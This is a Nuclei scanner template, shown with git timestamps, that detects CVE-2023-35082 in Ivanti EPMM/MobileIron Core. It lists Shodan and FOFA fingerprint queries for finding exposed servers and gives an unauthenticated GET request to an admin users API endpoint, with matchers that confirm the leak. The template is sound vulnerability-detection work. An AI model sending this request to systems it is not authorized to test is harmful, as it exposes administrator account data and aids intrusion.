nuclei-templates/http/cves/2023/CVE-2023-35082.yaml

44 lines
1.6 KiB
YAML
Raw Normal View History

2023-08-03 16:20:05 +00:00
id: CVE-2023-35082
info:
name: MobileIron Core - Remote Unauthenticated API Access
author: DhiyaneshDk
severity: critical
description: |
Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web applications security filter chain.
reference:
- https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2023-35082
- https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US
2023-08-31 11:46:18 +00:00
remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM)
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-35082
cwe-id: CWE-287
epss-score: 0.52767
cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
epss-percentile: 0.97143
2023-08-03 16:20:05 +00:00
metadata:
max-request: 1
verified: true
fofa-query: icon_hash="362091310"
shodan-query: http.favicon.hash:362091310
2023-08-31 11:46:18 +00:00
vendor: ivanti
product: endpoint_manager_mobile
2023-08-21 13:43:19 +00:00
tags: cve,cve2023,ivanti,mobileiron,epmm
2023-08-03 16:20:05 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/mifs/asfV3/api/v2/admins/users"
max-size: 100
matchers:
- type: dsl
dsl:
- contains_all(body, 'results','userId','name')
- contains(header, 'application/json')
- status_code == 200
condition: and